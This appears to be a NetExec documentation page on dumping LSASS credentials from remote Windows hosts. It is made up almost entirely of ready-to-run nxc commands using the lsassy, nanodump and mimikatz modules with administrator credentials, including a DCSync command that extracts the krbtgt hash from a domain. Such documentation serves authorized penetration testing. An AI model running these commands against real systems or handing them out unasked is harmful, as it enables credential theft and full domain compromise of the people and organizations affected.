Dump LSASS
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
Using Lsassy
Using the module Lsassy from @pixis , you can dump the credentials remotely
nxc smb 192.168.255.131 -u administrator -p pass -M lsassyUsing nanodump
Using the module nanodump you can dump the credentials remotely
nxc smb 192.168.255.131 -u administrator -p pass -M nanodumpUsing Mimikatz (deprecated)
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
Using the Mimikatz module, the powershell script Invoke-Mimikatz.ps1 will be executed on the remote target
nxc smb 192.168.255.131 -u administrator -p pass -M mimikatznxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"Last updated
Was this helpful?

